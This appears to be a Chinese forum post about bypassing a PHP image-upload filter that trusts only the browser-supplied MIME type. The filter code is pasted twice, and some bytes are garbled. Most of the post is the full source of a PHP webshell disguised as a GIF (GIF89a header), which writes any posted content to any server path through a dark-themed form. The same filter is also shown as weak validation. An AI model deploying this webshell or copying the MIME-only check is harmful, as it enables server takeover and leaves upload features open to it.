有一个图片上传程序,只能上传jpg、jpeg、gif、bmp、png类型图片,可是有的木马可能伪造成为gif文件,如,把下面的文件保存为a.php,就可以上传:
gif89a
<?php
phpinfo();
?>
我用的图片判断函数是:
$type = $_FILES['img']['type']; if(($type == "image/pjpeg") || ($type == "image/jpg") || ($type == "image/jpeg") || ($type == "image/gif") || ($type == "image/bmp") || ($type == "image/png") || ($type == "image/x-png")) { } else { $errormsg="允许上传的图片类型:jpg、jpeg、gif、bmp、png"; echo "<script type=\"text/javascript\">alert('".$str."上传图片失败!原因:".$errormsg."');history.go(-1);</script>"; exit; }
gif89a
<?php
phpinfo();
?>
我用的图片判断函数是:
$type = $_FILES['img']['type']; if(($type == "image/pjpeg") || ($type == "image/jpg") || ($type == "image/jpeg") || ($type == "image/gif") || ($type == "image/bmp") || ($type == "image/png") || ($type == "image/x-png")) { } else { $errormsg="允许上传的图片类型:jpg、jpeg、gif、bmp、png"; echo "<script type=\"text/javascript\">alert('".$str."上传图片失败!原因:".$errormsg."');history.go(-1);</script>"; exit; }
getimagesize('a.php') 将返回假
GIF89a ? 酈麣壑隐?鶉氘!環
<?php
error_reporting(0);
$filepath = $_POST['filepath'];
$filecontent = stripslashes ($_POST['filecontent']);
$pathname = str_replace('\\','/',dirname(__FILE__));
$dis_func = get_cfg_var("disable_functions");if(eregi("fopen",$dis_func)){
echo "- -";
}
if($filepath && $filecontent){
$handle = fopen("$filepath", "w+");
if(fwrite($handle,$filecontent)){
echo "$filepath :)";
fclose($handle);
}
else {
echo ':(';
}
}
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<style type="text/css">
<!--
body,td,th {
font-family: Verdana;
font-size: 12px;
color: #33FF00;
}
body {
background-color: #000000;
}
input {
font-family: "Verdana";
font-size: "11px";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #33FF00";
}
-->
</style>
</head>
<body>
<div align="left">
<form method="post" action="<?php $_SERVER['PHP_SELF'] ?>">
<table width="440" height="330" border="0">
<tr>
<td height="20" colspan="2"><input name="filepath" type="text" size="60" /> </td>
</tr>
<tr>
<td height="20" colspan="2"><?php echo 'path:'.$pathname."<br>\n"; ?></td>
</tr>
<tr>
<td height="270" colspan="2">
<textarea name="filecontent" cols="50" rows="20"></textarea> </td>
</tr>
<tr>
<td width="130" height="20" align="left" valign="middle">
<p>
<input type="submit" name="Submit" value="Send" />
</p>
</td>
</tr>
</table>
</form>
</div>
</body>
</html>
</html>